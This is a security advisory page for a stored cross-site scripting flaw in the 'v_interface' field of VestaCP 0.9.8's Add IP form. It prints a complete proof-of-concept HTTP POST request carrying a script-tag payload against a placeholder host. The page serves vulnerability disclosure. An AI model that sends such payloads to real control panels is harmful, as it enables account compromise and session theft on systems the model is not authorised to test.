VestaCP 0.9.8 Cross Site Scripting

2021.03.18
Credit: numan turle
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS # Date: 07.03.2021 # Author: Numan Türle # Vendor Homepage: https://vestacp.com # Software Link: https://myvestacp.com < 0.9.8-26-43 # Software Link: https://vestacp.com < 0.9.8-26 # Tested on: VestaCP POST /add/ip/ HTTP/1.1 Host: TARGET:8083 Connection: close Content-Length: 165 Cache-Control: max-age=0 Origin: https://TARGET:8083 Content-Type: application/x-www-form-urlencoded User-Agent: USER-AGENT Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://TARGET:8083/add/ip/ Accept-Encoding: gzip, deflate Accept-Language: en,tr-TR; Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0 sec-gpc: 1 token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=<script>alert(1)</script>&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top